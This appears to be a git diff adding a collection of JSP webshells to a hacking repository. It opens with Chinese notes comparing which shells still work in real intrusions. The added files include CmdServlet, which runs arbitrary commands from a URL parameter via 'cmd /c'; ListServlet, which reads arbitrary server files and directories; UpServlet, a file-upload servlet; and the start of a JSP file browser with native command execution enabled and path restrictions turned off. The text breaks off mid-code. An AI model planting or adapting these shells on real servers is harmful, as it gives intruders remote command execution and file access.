+JSP无组件实现WEB上传.rar 也失效 + +一句话jsp那个 可以传过去 但是无法写出文件 + + +77收集的几个 Win下测试 + +browser.jsp 可以使用 但是文件上传功能报废 原因都是这个组件 org.apache.jasper + +还有是cmd相关的也可用 也只是win下的 + +其它都是直接报废。。。。。 + +法客工具包里的jsp +no.jsp 其实是那个什么jsfoloer改的 也是上传文件功能不行 别的功能未测 +silic webshell.jsp 和no.jsp in.jsp都是jsfoloer改的 + +JspSpyJDK5.jsp 报废 + +ma2.jsp 能解析 但上传文件那失败 java.io.IOException: 这就是IO了 +ma3.jsp 直接报废 因为使用的是jasper +ma1.jsp 和ma4.jsp job.jsp探针 能正常解析 +spjspshell.jsp 直接报废 同ma3.jsp 用的组件一样 + +总结: 普通单纯执行cmd一类的都能正常运行,探针也是 个别大马也勉强 jspspy 1.0兼容性 比较靠普 +在这些样本里90%都挂了 实战中 也许有些站加了上传组件啥的 可能部分上传脚本还是能用的 具体自测 diff --git a/jsp/hackk8/jsp2/CmdServlet.class b/jsp/hackk8/jsp2/CmdServlet.class new file mode 100644 index 0000000..4afd7f1 Binary files /dev/null and b/jsp/hackk8/jsp2/CmdServlet.class differ diff --git a/jsp/hackk8/jsp2/CmdServlet.java b/jsp/hackk8/jsp2/CmdServlet.java new file mode 100644 index 0000000..f9cb31a --- /dev/null +++ b/jsp/hackk8/jsp2/CmdServlet.java @@ -0,0 +1,43 @@ +/* + * CmdServlet.java 20/01/2004 + * + * @author The Dark Raver + * @version 0.1 + */ + +import java.io.*; +import javax.servlet.*; +import javax.servlet.http.*; + + +public class CmdServlet extends HttpServlet { + + public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { + res.setContentType("text/html"); + + PrintWriter out = res.getWriter(); + out.print(""); + out.print("

    "); + out.print(""); + out.print(""); + out.print("
    "); + + if(req.getParameter("cmd") != null) { + out.print("\n

    Command: " + req.getParameter("cmd") + "\n

    \n");
+	        Process p = Runtime.getRuntime().exec("cmd /c " + req.getParameter("cmd"));
+	        DataInputStream procIn = new DataInputStream(p.getInputStream());
+			int c='\0';
+        	while ((c=procIn.read()) != -1) {
+				out.print((char)c);
+				}
+	        }
+
+		out.print("\n
    "); + out.print(""); + } + + public String getServletInfo() { + return "CmdServlet 0.1"; + } + +} diff --git a/jsp/hackk8/jsp2/ListServlet.class b/jsp/hackk8/jsp2/ListServlet.class new file mode 100644 index 0000000..b816179 Binary files /dev/null and b/jsp/hackk8/jsp2/ListServlet.class differ diff --git a/jsp/hackk8/jsp2/ListServlet.java b/jsp/hackk8/jsp2/ListServlet.java new file mode 100644 index 0000000..1d97304 --- /dev/null +++ b/jsp/hackk8/jsp2/ListServlet.java @@ -0,0 +1,86 @@ +/* + * ListServlet.java + * + * @author Sierra + * @version 0.1 + */ + +import java.io.*; +import javax.servlet.ServletException; +import javax.servlet.http.*; + +public class ListServlet extends HttpServlet +{ + + + public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException { + PrintWriter printwriter = res.getWriter(); + String path = req.getParameter("file"); + + printwriter.write("\n\nDirectory Listing\n\n\n"); + printwriter.write("\n"); + if(req.getParameter("file")==null) path = "c:\\"; + printwriter.write("

    Path: " + path + "

    \n");
+
+		File file = new File(path);
+
+		if(file.isDirectory())
+		{
+			String s = new String("Unknown");
+			String s2 = new String("Black");
+			File afile[] = file.listFiles();
+			for(int i = 0; i < afile.length; i++)
+			{
+				String s1 = new String(afile[i].toString());
+				printwriter.write("(");
+				String s3;
+				if(afile[i].isDirectory())
+				{
+					printwriter.write("d");
+					s1 = s1 + "/";
+					s3 = new String("Blue");
+				} else
+				if(afile[i].isFile())
+				{
+					printwriter.write("-");
+					s3 = new String("Green");
+				} else
+				{
+					printwriter.write("?");
+					s3 = new String("Red");
+				}
+				if(afile[i].canRead())
+					printwriter.write("r");
+				else
+					printwriter.write("-");
+				if(afile[i].canWrite())
+					printwriter.write("w");
+				else
+					printwriter.write("-");
+				printwriter.write(") " + s1.toString() + " " + "( Size: " + afile[i].length() + " bytes )
    \n");
+			}
+
+			printwriter.write("
    ");
+		} else
+		if(file.canRead())
+		{
+			FileInputStream fileinputstream = new FileInputStream(file);
+			int j = 0;
+				while(j >= 0)
+				{
+					j = fileinputstream.read();
+					printwriter.write(j);
+				}
+			fileinputstream.close();
+		} else
+		{
+			printwriter.write("Can't Read file
    ");
+		}
+
+    }
+
+
+    public String getServletInfo() {
+        return "Directory Listing";
+    }
+}
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/UpServlet.class b/jsp/hackk8/jsp2/UpServlet.class
new file mode 100644
index 0000000..fef990e
Binary files /dev/null and b/jsp/hackk8/jsp2/UpServlet.class differ
diff --git a/jsp/hackk8/jsp2/UpServlet.java b/jsp/hackk8/jsp2/UpServlet.java
new file mode 100644
index 0000000..4936667
--- /dev/null
+++ b/jsp/hackk8/jsp2/UpServlet.java
@@ -0,0 +1,71 @@
+/*
+ * UpServlet.java	29/04/2005
+ *
+ * @author The Dark Raver
+ * @version 0.1
+ */
+
+import java.io.*;
+import javax.servlet.*;
+import javax.servlet.http.*;
+
+
+public class UpServlet extends HttpServlet {
+
+    public void doGet(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
+		res.setContentType("text/html");
+		PrintWriter out = res.getWriter();
+		out.print("");
+		out.print("
    ");
+		out.print("UPLOAD ");
+		out.print("");
+		out.print("
    ");
+		out.print("");
+	}
+
+
+    public void doPost(HttpServletRequest req, HttpServletResponse res) throws ServletException, IOException {
+		String tag = new String();
+		int c = '\0';
+		int contador = 0;
+		ServletInputStream in = req.getInputStream();
+        DataInputStream post = new DataInputStream(in);
+
+		PrintWriter out = res.getWriter();
+		res.setContentType("text/html");
+		out.print("
    ");
+
+		while((c=post.read()) != -1 && c != '\r' && c != '\n') {
+			tag=tag.concat("" + (char)c);
+			contador++;
+			}
+
+		for(int i=0; i <4; i++) while((c=post.read()) != -1 && c != '\n') contador++;
+
+		// out.print("CONTENT_LEN = " + req.getContentLength() + " / TAG = [" + tag + "] / TAG_LEN = " + tag.length() + "\n");
+		// out.print("CONTADOR = " + contador + " / FILE_LEN = " + (req.getContentLength() - tag.length() - contador - 11) + " ==>");
+
+		// (!) Uploaded File Name
+
+		File newfile = new File("c:\\install.log");
+
+		/////////////////////////
+
+		FileOutputStream fileout = new FileOutputStream(newfile);
+
+		for(int i=0; i < req.getContentLength() - tag.length() - contador - 11; i++) {
+			c=post.read();
+			fileout.write((char)c);
+			}
+
+		fileout.close();
+		out.print("<== OK");
+
+    }
+
+
+    public String getServletInfo() {
+		return "UpServlet 0.1";
+    }
+
+}
\ No newline at end of file
diff --git a/jsp/hackk8/jsp2/browser.jsp b/jsp/hackk8/jsp2/browser.jsp
new file mode 100644
index 0000000..7d85dc8
--- /dev/null
+++ b/jsp/hackk8/jsp2/browser.jsp
@@ -0,0 +1,1802 @@
+<%--
+	jsp File browser 1.1a
+	Copyright (C) 2003,2004, Boris von Loesch
+	This program is free software; you can redistribute it and/or modify it under
+	the terms of the GNU General Public License as published by the
+	Free Software Foundation; either version 2 of the License, or (at your option)
+	any later version.
+	This program is distributed in the hope that it will be useful, but
+	WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
+	FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
+	You should have received a copy of the GNU General Public License along with
+	this program; if not, write to the
+	Free Software Foundation, Inc.,
+	59 Temple Place, Suite 330,
+	Boston, MA 02111-1307 USA
+	- Description: jsp File browser v1.1a -- This JSP program allows remote web-based
+				file access and manipulation.  You can copy, create, move and delete files.
+				Text files can be edited and groups of files and folders can be downloaded
+				as a single zip file that's created on the fly.
+	- Credits: Taylor Bastien, David Levine, David Cowan, Lieven Govaerts
+--%>
+<%@page import="java.util.*,
+                java.net.*,
+                java.text.*,
+                java.util.zip.*,
+                java.io.*"
+%>
+<%!
+    //FEATURES
+    private static final boolean NATIVE_COMMANDS = true;
+
+    //Allow browsing and file manipulation only in certain directories
+	private static final boolean RESTRICT_BROWSING = false;
+    //If true, the user is allowed to browse only in RESTRICT_PATH,
+    //if false, the user is allowed to browse all directories besides RESTRICT_PATH
+    private static final boolean RESTRICT_WHITELIST = false;
+    //Paths, sperated by semicolon
+    //private static final String RESTRICT_PATH = "C:\\CODE;E:\\"; //Win32: Case important!!
+	private static final String RESTRICT_PATH = "/etc;/var";
+
+    //The refresh time in seconds of the upload monitor window
+	private static final int UPLOAD_MONITOR_REFRESH = 2;
+	//The number of colums for the edit field
+	private static final int EDITFIELD_COLS = 85;
+	//The number of rows for the edit field
+	private static final int EDITFIELD_ROWS = 30;
+	//Open a new window to view a file
+	private static final boolean USE_POPUP = true;
+	/**
+	 * If USE_DIR_PREVIEW = true, then for every directory a tooltip will be
+	 * created (hold the mouse over the link) with the first DIR_PREVIEW_NUMBER entries.
+	 * This can yield to performance issues. Turn it of, if the directory loads to slow.
+	 */
+	private static final boolean USE_DIR_PREVIEW = true;
+	private static final int DIR_PREVIEW_NUMBER = 10;
+	/**
+	 * The name of an optional CSS Stylesheet file
+	 */
+	private static final String CSS_NAME = "Browser.css";
+	/**
+	 * The compression level for zip file creation (0-9)
+	 * 0 = No compression
+	 * 1 = Standard compression (Very fast)
+	 * ...
+	 * 9 = Best compression (Very slow)
+	 */
+	private static final int COMPRESSION_LEVEL = 1;
+	/**
+	 * The FORBIDDEN_DRIVES are not displayed on the list. This can be usefull, if the
+	 * server runs on a windows platform, to avoid a message box, if you try to access
+	 * an empty removable drive (See KNOWN BUGS in Readme.txt).
+	 */
+	private static final String[] FORBIDDEN_DRIVES = {"a:\\"};
+
+	/**
+	 * Command of the shell interpreter and the parameter to run a programm
+	 */
+	private static final String[] COMMAND_INTERPRETER = {"cmd", "/C"}; // Dos,Windows
+	//private static final String[] COMMAND_INTERPRETER = {"/bin/sh","-c"}; 	// Unix
+
+	/**
+	 * Max time in ms a process is allowed to run, before it will be terminated
+	 */
+	private static final long MAX_PROCESS_RUNNING_TIME = 30 * 1000; //30 seconds
+
+	//Button names
+	private static final String SAVE_AS_ZIP = "Download selected files as zip";
+	private static final String RENAME_FILE = "Rename File";
+	private static final String DELETE_FILES = "Delete selected files";
+	private static final String CREATE_DIR = "Create Dir";
+	private static final String CREATE_FILE = "Create File";
+	private static final String MOVE_FILES = "Move Files";
+	private static final String COPY_FILES = "Copy Files";
+
+	//Normally you should not change anything after this line
+	//----------------------------------------------------------------------------------
+	//Change this to locate the tempfile directory for upload (not longer needed)
+	private static String tempdir = ".";
+	private static String VERSION_NR = "1.1a";
+	private static DateFormat dateFormat = DateFormat.getDateTimeInstance();
+
+	public class UplInfo {
+
+		public long totalSize;
+		public long currSize;
+		public long starttime;
+		public boolean aborted;
+
+		public UplInfo() {
+			totalSize = 0l;
+			currSize = 0l;
+			starttime = System.currentTimeMillis();
+			aborted = false;
+		}
+
+		public UplInfo(int size) {
+			totalSize = size;
+			currSize = 0;
+			starttime = System.currentTimeMillis();
+			aborted = false;
+		}
+
+		public String getUprate() {
+			long time = System.currentTimeMillis() - starttime;
+			if (time != 0) {
+				long uprate = currSize * 1000 / time;
+				return convertFileSize(uprate) + "/s";
+			}
+			else return "n/a";
+		}
+
+		public int getPercent() {
+			if (totalSize == 0) return 0;
+			else return (int) (currSize * 100 / totalSize);
+		}
+
+		public String getTimeElapsed() {
+			long time = (System.currentTimeMillis() - starttime) / 1000l;
+			if (time - 60l >= 0){
+				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+				else return time / 60 + ":0" + (time % 60) + "m";
+			}
+			else return time<10 ? "0" + time + "s": time + "s";
+		}
+
+		public String getTimeEstimated() {
+			if (currSize == 0) return "n/a";
+			long time = System.currentTimeMillis() - starttime;
+			time = totalSize * time / currSize;
+			time /= 1000l;
+			if (time - 60l >= 0){
+				if (time % 60 >=10) return time / 60 + ":" + (time % 60) + "m";
+				else return time / 60 + ":0" + (time % 60) + "m";
+			}
+			else return time<10 ? "0" + time + "s": time + "s";
+		}
+
+	}
+
+	public class FileInfo {
+
+		public String name = null, clientFileName = null, fileContentType = null;
+		private byte[] fileContents = null;
+		public File file = null;
+		public StringBuffer sb = new StringBuffer(100);
+
+		public void setFileContents(byte[] aByteArray) {
+			fileContents = new byte[aByteArray.length];
+			System.arraycopy(aByteArray, 0, fileContents, 0, aByteArray.length);
+		}
+	}
+
+	public static class UploadMonitor {
+
+		static Hashtable uploadTable = new Hashtable();
+
+		static void set(String fName, UplInfo info) {
+			uploadTable.put(fName, info);
+		}
+
+		static void remove(String fName) {
+			uploadTable.remove(fName);
+		}
+
+		static UplInfo getInfo(String fName) {
+			UplInfo info = (UplInfo) uploadTable.get(fName);
+			return info;
+		}
+	}
+
+	// A Class with methods used to process a ServletInputStream
+	public class HttpMultiPartParser {
+
+		private final String lineSeparator = System.getProperty("line.separator", "\n");
+		private final int ONE_MB = 1024 * 1;
+
+		public Hashtable processData(ServletInputStream is, String boundary, String saveInDir,
+				int clength) throws IllegalArgumentException, IOException {
+			if (is == null) throw new IllegalArgumentException("InputStream");
+			if (boundary == null || boundary.trim().length() < 1) throw new IllegalArgumentException(
+					"\"" + boundary + "\" is an illegal boundary indicator");
+			boundary = "--" + boundary;
+			StringTokenizer stLine = null, stFields = null;
+			FileInfo fileInfo = null;
+			Hashtable dataTable = new Hashtable(5);
+			String line = null, field = null, paramName = null;
+			boolean saveFiles = (saveInDir != null && saveInDir.trim().length() > 0);
+			boolean isFile = false;
+			if (saveFiles) { // Create the required directory (including parent dirs)
+				File f = new File(saveInDir);
+				f.mkdirs();
+			}
+			line = getLine(is);
+			if (line == null || !line.startsWith(boundary)) throw new IOException(
+					"Boundary not found; boundary = " + boundary + ", line = " + line);
+			while (line != null) {
+				if (line == null || !line.startsWith(boundary)) return dataTable;
+				line = getLine(is);
+				if (line == null) return dataTable;
+				stLine = new StringTokenizer(line, ";\r\n");
+				if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+						"Bad data in second line");
+				line = stLine.nextToken().toLowerCase();
+				if (line.indexOf("form-data") < 0) throw new IllegalArgumentException(
+						"Bad data in second line");
+				stFields = new StringTokenizer(stLine.nextToken(), "=\"");
+				if (stFields.countTokens() < 2) throw new IllegalArgumentException(
+						"Bad data in second line");
+				fileInfo = new FileInfo();
+				stFields.nextToken();
+				paramName = stFields.nextToken();
+				isFile = false;
+				if (stLine.hasMoreTokens()) {
+					field = stLine.nextToken();
+					stFields = new StringTokenizer(field, "=\"");
+					if (stFields.countTokens() > 1) {
+						if (stFields.nextToken().trim().equalsIgnoreCase("filename")) {
+							fileInfo.name = paramName;
+							String value = stFields.nextToken();
+							if (value != null && value.trim().length() > 0) {
+								fileInfo.clientFileName = value;
+								isFile = true;
+							}
+							else {
+								line = getLine(is); // Skip "Content-Type:" line
+								line = getLine(is); // Skip blank line
+								line = getLine(is); // Skip blank line
+								line = getLine(is); // Position to boundary line
+								continue;
+							}
+						}
+					}
+					else if (field.toLowerCase().indexOf("filename") >= 0) {
+						line = getLine(is); // Skip "Content-Type:" line
+						line = getLine(is); // Skip blank line
+						line = getLine(is); // Skip blank line
+						line = getLine(is); // Position to boundary line
+						continue;
+					}
+				}
+				boolean skipBlankLine = true;
+				if (isFile) {
+					line = getLine(is);
+					if (line == null) return dataTable;
+					if (line.trim().length() < 1) skipBlankLine = false;
+					else {
+						stLine = new StringTokenizer(line, ": ");
+						if (stLine.countTokens() < 2) throw new IllegalArgumentException(
+								"Bad data in third line");
+						stLine.nextToken(); // Content-Type
+						fileInfo.fileContentType = stLine.nextToken();
+					}
+				}
+				if (skipBlankLine) {
+					line = getLine(is);
+					if (line == null) return dataTable;
+				}
+				if (!isFile) {
+					line = getLine(is);
+					if (line == null) return dataTable;
+					dataTable.put(paramName, line);
+					// If parameter is dir, change saveInDir to dir
+					if (paramName.equals("dir")) saveInDir = line;
+					line = getLine(is);
+					continue;
+				}
+				try {
+					UplInfo uplInfo = new UplInfo(clength);
+					UploadMonitor.set(fileInfo.clientFileName, uplInfo);
+					OutputStream os = null;
+					String path = null;
+					if (saveFiles) os = new FileOutputStream(path = getFileName(saveInDir,
+							fileInfo.clientFileName));
+					else os = new ByteArrayOutputStream(ONE_MB);
+					boolean readingContent = true;
+					byte previousLine[] = new byte[2 * ONE_MB];
+					byte temp[] = null;
+					byte currentLine[] = new byte[2 * ONE_MB];
+					int read, read3;
+					if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) {
+						line = null;
+						break;
+					}
+					while (readingContent) {
+						if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) {
+							line = null;
+							uplInfo.aborted = true;
+							break;
+						}
+						if (compareBoundary(boundary, currentLine)) {
+							os.write(previousLine, 0, read - 2);
+							line = new String(currentLine, 0, read3);
+							break;
+						}
+						else {
+							os.write(previousLine, 0, read);
+							uplInfo.currSize += read;
+							temp = currentLine;
+							currentLine = previousLine;
+							previousLine = temp;
+							read = read3;
+						}//end else
+					}//end while
+					os.flush();
+					os.close();
+					if (!saveFiles) {
+						ByteArrayOutputStream baos = (ByteArrayOutputStream) os;
+						fileInfo.setFileContents(baos.toByteArray());
+					}
+					else fileInfo.file = new File(path);
+					dataTable.put(paramName, fileInfo);
+					uplInfo.currSize = uplInfo.totalSize;
+				}//end try
+				catch (IOException e) {
+					throw e;
+				}
+			}
+			return dataTable;
+		}
+
+		/**
+		 * Compares boundary string to byte array
+		 */
+		private boolean compareBoundary(String boundary, byte ba[]) {
+			byte b;
+			if (boundary == null || ba == null) return false;
+			for (int i = 0; i < boundary.length(); i++)
+				if ((byte) boundary.charAt(i) != ba[i]) return false;
+			return true;
+		}
+
+		/** Convenience method to read HTTP header lines */
+		private synchronized String getLine(ServletInputStream sis) throws IOException {
+			byte b[] = new byte[1024];
+			int read = sis.readLine(b, 0, b.length), index;
+			String line = null;
+			if (read != -1) {
+				line = new String(b, 0, read);
+				if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index - 1);
+			}
+			return line;
+		}
+
+		public String getFileName(String dir, String fileName) throws IllegalArgumentException {
+			String path = null;
+			if (dir == null || fileName == null) throw new IllegalArgumentException(
+					"dir or fileName is null");
+			int index = fileName.lastIndexOf('/');
+			String name = null;
+			if (index >= 0) name = fileName.substring(index + 1);
+			else name = fileName;
+			index = name.lastIndexOf('\\');
+			if (index >= 0) fileName = name.substring(index + 1);
+			path = dir + File.separator + fileName;
+			if (File.separatorChar == '/') return path.replace('\\', File.separatorChar);
+			else return path.replace('/', File.separatorChar);
+		}
+	} //End of class HttpMultiPartParser
+
+	/**
+	 * This class is a comparator to sort the filenames and dirs
+	 */
+	class FileComp implements Comparator {
+
+		int mode;
+		int sign;
+
+		FileComp() {
+			this.mode = 1;
+			this.sign = 1;
+		}
+
+		/**
+		 * @param mode sort by 1=Filename, 2=Size, 3=Date, 4=Type
+		 * The default sorting method is by Name
+		 * Negative mode means descending sort
+		 */
+		FileComp(int mode) {
+			if (mode < 0) {
+				this.mode = -mode;
+				sign = -1;
+			}
+			else {
+				this.mode = mode;
+				this.sign = 1;
+			}
+		}
+
+		public int compare(Object o1, Object o2) {
+			File f1 = (File) o1;
+			File f2 = (File) o2;
+			if (f1.isDirectory()) {
+				if (f2.isDirectory()) {
+					switch (mode) {
+					//Filename or Type
+					case 1:
+					case 4:
+						return sign
+								* f1.getAbsolutePath().toUpperCase().compareTo(
+										f2.getAbsolutePath().toUpperCase());
+					//Filesize
+					case 2:
+						return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+					//Date
+					case 3:
+						return sign
+								* (new Long(f1.lastModified())
+										.compareTo(new Long(f2.lastModified())));
+					default:
+						return 1;
+					}
+				}
+				else return -1;
+			}
+			else if (f2.isDirectory()) return 1;
+			else {
+				switch (mode) {
+				case 1:
+					return sign
+							* f1.getAbsolutePath().toUpperCase().compareTo(
+									f2.getAbsolutePath().toUpperCase());
+				case 2:
+					return sign * (new Long(f1.length()).compareTo(new Long(f2.length())));
+				case 3:
+					return sign
+							* (new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())));
+				case 4: { // Sort by extension
+					int tempIndexf1 = f1.getAbsolutePath().lastIndexOf('.');
+					int tempIndexf2 = f2.getAbsolutePath().lastIndexOf('.');
+					if ((tempIndexf1 == -1) && (tempIndexf2 == -1)) { // Neither have an extension
+						return sign
+								* f1.getAbsolutePath().toUpperCase().compareTo(
+										f2.getAbsolutePath().toUpperCase());
+					}
+					// f1 has no extension
+					else if (tempIndexf1 == -1) return -sign;
+					// f2 has no extension
+					else if (tempIndexf2 == -1) return sign;
+					// Both have an extension
+					else {
+						String tempEndf1 = f1.getAbsolutePath().toUpperCase()
+								.substring(tempIndexf1);
+						String tempEndf2 = f2.getAbsolutePath().toUpperCase()
+								.substring(tempIndexf2);
+						return sign * tempEndf1.compareTo(tempEndf2);
+					}
+				}
+				default:
+					return 1;
+				}
+			}
+		}
+	}
+
+	/**
+	 * Wrapperclass to wrap an OutputStream around a Writer
+	 */
+	class Writer2Stream extends OutputStream {
+
+		Writer out;
+
+		Writer2Stream(Writer w) {
+			super();
+			out = w;
+		}
+
+		public void write(int i) throws IOException {
+			out.write(i);
+		}
+
+		public void write(byte[] b) throws IOException {
+			for (int i = 0; i < b.length; i++) {
+				int n = b[i];
+				//Convert byte to ubyte
+				n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+				out.write(n);
+			}
+		}
+
+		public void write(byte[] b, int off, int len) throws IOException {
+			for (int i = off; i < off + len; i++) {
+				int n = b[i];
+				n = ((n >>> 4) & 0xF) * 16 + (n & 0xF);
+				out.write(n);
+			}
+		}
+	} //End of class Writer2Stream
+
+	static Vector expandFileList(String[] files, boolean inclDirs) {
+		Vector v = new Vector();
+		if (files == null) return v;
+		for (int i = 0; i < files.length; i++)
+			v.add(new File(URLDecoder.decode(files[i])));
+		for (int i = 0; i < v.size(); i++) {
+			File f = (File) v.get(i);
+			if (f.isDirectory()) {
+				File[] fs = f.listFiles();
+				for (int n = 0; n < fs.length; n++)
+					v.add(fs[n]);
+				if (!inclDirs) {
+					v.remove(i);
+					i--;
+				}
+			}
+		}
+		return v;
+	}
+
+	/**
+	 * Method to build an absolute path
+	 * @param dir the root dir
+	 * @param name the name of the new directory
+	 * @return if name is an absolute directory, returns name, else returns dir+name
+	 */
+	static String getDir(String dir, String name) {
+		if (!dir.endsWith(File.separator)) dir = dir + File.separator;
+		File mv = new File(name);
+		String new_dir = null;
+		if (!mv.isAbsolute()) {
+			new_dir = dir + name;
+		}
+		else new_dir = name;
+		return new_dir;
+	}
+
+	/**
+	 * This Method converts a byte size in a kbytes or Mbytes size, depending on the size
+	 *     @param size The size in bytes
+	 *     @return String with size and unit
+	 */
+	static String convertFileSize(long size) {
+		int divisor = 1;
+		String unit = "bytes";
+		if (size >= 1024 * 1024) {
+			divisor = 1024 * 1024;
+			unit = "MB";
+		}
+		else if (size >= 1024) {
+			divisor = 1024;
+			unit = "KB";
+		}
+		if (divisor == 1) return size / divisor + " " + unit;
+		String aftercomma = "" + 100 * (size % divisor) / divisor;
+		if (aftercomma.length() == 1) aftercomma = "0" + aftercomma;
+		return size / divisor + "." + aftercomma + " " + unit;
+	}
+
+	/**
+	 * Copies all data from in to out
+	 * 	@param in the input stream
+	 *	@param out the output stream
+	 *	@param buffer copy buffer
+	 */
+	static void copyStreams(InputStream in, OutputStream out, byte[] buffer) throws IOException {
+		copyStreamsWithoutClose(in, out, buffer);
+		in.close();
+		out.close();
+	}
+
+	/**
+	 * Copies all data from in to out
+	 * 	@param in the input stream
+	 *	@param out the output stream
+	 *	@param buffer copy buffer
+	 */
+	static void copyStreamsWithoutClose(InputStream in, OutputStream out, byte[] buffer)
+			throws IOException {
+		int b;
+		while ((b = in.read(buffer)) != -1)
+			out.write(buffer, 0, b);
+	}
+
+	/**
+	 * Returns the Mime Type of the file, depending on the extension of the filename
+	 */
+	static String getMimeType(String fName) {
+		fName = fName.toLowerCase();
+		if (fName.endsWith(".jpg") || fName.endsWith(".jpeg") || fName.endsWith(".jpe")) return "image/jpeg";
+		else if (fName.endsWith(".gif")) return "image/gif";
+		else if (fName.endsWith(".pdf")) return "application/pdf";
+		else if (fName.endsWith(".htm") || fName.endsWith(".html") || fName.endsWith(".shtml")) return "text/html";
+		else if (fName.endsWith(".avi")) return "video/x-msvideo";
+		else if (fName.endsWith(".mov") || fName.endsWith(".qt")) return "video/quicktime";
+		else if (fName.endsWith(".mpg") || fName.endsWith(".mpeg") || fName.endsWith(".mpe")) return "video/mpeg";
+		else if (fName.endsWith(".zip")) return "application/zip";
+		else if (fName.endsWith(".tiff") || fName.endsWith(".tif")) return "image/tiff";
+		else if (fName.endsWith(".rtf")) return "application/rtf";
+		else if (fName.endsWith(".mid") || fName.endsWith(".midi")) return "audio/x-midi";
+		else if (fName.endsWith(".xl") || fName.endsWith(".xls") || fName.endsWith(".xlv")
+				|| fName.endsWith(".xla") || fName.endsWith(".xlb") || fName.endsWith(".xlt")
+				|| fName.endsWith(".xlm") || fName.endsWith(".xlk")) return "application/excel";
+		else if (fName.endsWith(".doc") || fName.endsWith(".dot")) return "application/msword";
+		else if (fName.endsWith(".png")) return "image/png";
+		else if (fName.endsWith(".xml")) return "text/xml";
+		else if (fName.endsWith(".svg")) return "image/svg+xml";
+		else if (fName.endsWith(".mp3")) return "audio/mp3";
+		else if (fName.endsWith(".ogg")) return "audio/ogg";
+		else return "text/plain";
+	}
+
+	/**
+	 * Converts some important chars (int) to the corresponding html string
+	 */
+	static String conv2Html(int i) {
+		if (i == '&') return "&";
+		else if (i == '<') return "<";
+		else if (i == '>') return ">";
+		else if (i == '"') return """;
+		else return "" + (char) i;
+	}
+
+	/**
+	 * Converts a normal string to a html conform string
+	 */
+	static String conv2Html(String st) {
+		StringBuffer buf = new StringBuffer();
+		for (int i = 0; i < st.length(); i++) {
+			buf.append(conv2Html(st.charAt(i)));
+		}
+		return buf.toString();
+	}
+
+	/**
+	 * Starts a native process on the server
+	 * 	@param command the command to start the process
+	 *	@param dir the dir in which the process starts
+	 */
+	static String startProcess(String command, String dir) throws IOException {
+		StringBuffer ret = new StringBuffer();
+		String[] comm = new String[3];
+		comm[0] = COMMAND_INTERPRETER[0];
+		comm[1] = COMMAND_INTERPRETER[1];
+		comm[2] = command;
+		long start = System.currentTimeMillis();
+		try {
+			//Start process
+			Process ls_proc = Runtime.getRuntime().exec(comm, null, new File(dir));
+			//Get input and error streams
+			BufferedInputStream ls_in = new BufferedInputStream(ls_proc.getInputStream());
+			BufferedInputStream ls_err = new BufferedInputStream(ls_proc.getErrorStream());
+			boolean end = false;
+			while (!end) {
+				int c = 0;
+				while ((ls_err.available() > 0) && (++c <= 1000)) {
+					ret.append(conv2Html(ls_err.read()));
+				}
+				c = 0;
+				while ((ls_in.available() > 0) && (++c <= 1000)) {
+					ret.append(conv2Html(ls_in.read()));
+				}
+				try {
+					ls_proc.exitValue();
+					//if the process has not finished, an exception is thrown
+					//else
+					while (ls_err.available() > 0)
+						ret.append(conv2Html(ls_err.read()));
+					while (ls_in.available() > 0)
+						ret.append(conv2Html(ls_in.read()));
+					end = true;
+				}
+				catch (IllegalThreadStateException ex) {
+					//Process is running
+				}
+				//The process is not allowed to run longer than given time.
+				if (System.currentTimeMillis() - start > MAX_PROCESS_RUNNING_TIME) {
+					ls_proc.destroy();
+					end = true;
+					ret.append("!!!! Process has timed out, destroyed !!!!!");
+				}
+				try {
+					Thread.sleep(50);
+				}
+				catch (InterruptedException ie) {}
+			}
+		}
+		catch (IOException e) {
+			ret.append("Error: " + e);
+		}
+		return ret.toString();
+	}
+
+	/**
+	 * Converts a dir string to a linked dir string
+	 * 	@param dir the directory string (e.g. /usr/local/httpd)
+	 *	@param browserLink web-path to Browser.jsp
+	 */
+	static String dir2linkdir(String dir, String browserLink, int sortMode) {
+		File f = new File(dir);
+		StringBuffer buf = new StringBuffer();
+		while (f.getParentFile() != null) {
+			if (f.canRead()) {
+				String encPath = URLEncoder.encode(f.getAbsolutePath());
+				buf.insert(0, "" + conv2Html(f.getName()) + File.separator + "");
+			}
+			else buf.insert(0, conv2Html(f.getName()) + File.separator);
+			f = f.getParentFile();
+		}
+		if (f.canRead()) {
+			String encPath = URLEncoder.encode(f.getAbsolutePath());
+			buf.insert(0, "" + conv2Html(f.getAbsolutePath()) + "");
+		}
+		else buf.insert(0, f.getAbsolutePath());
+		return buf.toString();
+	}
+
+	/**
+	 *	Returns true if the given filename tends towards a packed file
+	 */
+	static boolean isPacked(String name, boolean gz) {
+		return (name.toLowerCase().endsWith(".zip") || name.toLowerCase().endsWith(".jar")
+				|| (gz && name.toLowerCase().endsWith(".gz")) || name.toLowerCase()
+				.endsWith(".war"));
+	}
+
+	/**
+	 *	If RESTRICT_BROWSING = true this method checks, whether the path is allowed or not
+	 */
+	static boolean isAllowed(File path) throws IOException{
+		if (RESTRICT_BROWSING) {
+            StringTokenizer stk = new StringTokenizer(RESTRICT_PATH, ";");
+            while (stk.hasMoreTokens()){
+			    if (path!=null && path.getCanonicalPath().startsWith(stk.nextToken()))
+                    return RESTRICT_WHITELIST;
+            }
+            return !RESTRICT_WHITELIST;
+		}
+		else return true;
+	}
+
+	//---------------------------------------------------------------------------------------------------------------
+
+	%>
+<%
+		//Get the current browsing directory
+		request.setAttribute("dir", request.getParameter("dir"));
+		// The browser_name variable is used to keep track of the URI
+		// of the jsp file itself.  It is used in all link-backs.
+		final String browser_name = request.getRequestURI();
+		final String FOL_IMG = "";
+		boolean nohtml = false;
+		boolean dir_view = true;
+		// View file
+		if (request.getParameter("file") != null) {
+            File f = new File(request.getParameter("file"));
+            if (!isAllowed(f)) {
+                request.setAttribute("dir", f.getParent());
